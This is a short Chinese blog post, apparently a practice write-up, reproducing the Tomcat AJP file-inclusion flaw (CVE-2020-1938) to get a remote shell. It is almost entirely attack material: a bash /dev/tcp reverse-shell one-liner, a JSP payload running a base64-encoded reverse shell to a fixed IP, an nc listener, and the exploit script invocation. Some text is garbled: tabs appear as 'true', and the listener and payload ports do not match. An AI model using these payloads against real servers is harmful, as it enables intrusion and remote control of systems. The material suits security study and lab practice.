avatar

每日一练之"AJP漏洞Tomcat文件包含"

之前的新生赛也打过。。。

https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read

用到的是文件包含漏洞

准备工作

首先服务器的端口要打开。。。

http://www.jackson-t.ca/runtime-exec-payloads.html

在这编译下

bash -i >& /dev/tcp/服务器/端口号 0>&1

<%
truejava.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
trueint a = -1;
truebyte[] b = new byte[2048];
trueout.print("<pre>");
truewhile((a=in.read(b))!=-1){
truetrueout.println(new String(b));
true}
trueout.print("</pre>");
%>

替换中间的exec指令即可,保存为shell.txt

复现过程

在目标服务器上传shell.txt,然后需要知道上传的文件名

监听端口号

nc -lvp 14888

替换下面指令

python Tomcat-ROOT路径下文件包含(CVE-2020-1938).py -p 8009 -f /WEB-INF/uploads/???.txt 服务器

然后就getshell了

参考:http://www.svenbeast.com/post/fqSI9laE8/

文章作者: X Mεl0n
文章链接: http://www.zrzz.site/2020/03/29/AJP%E6%BC%8F%E6%B4%9ETomcat%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 X Mεl0n | 随手记

评论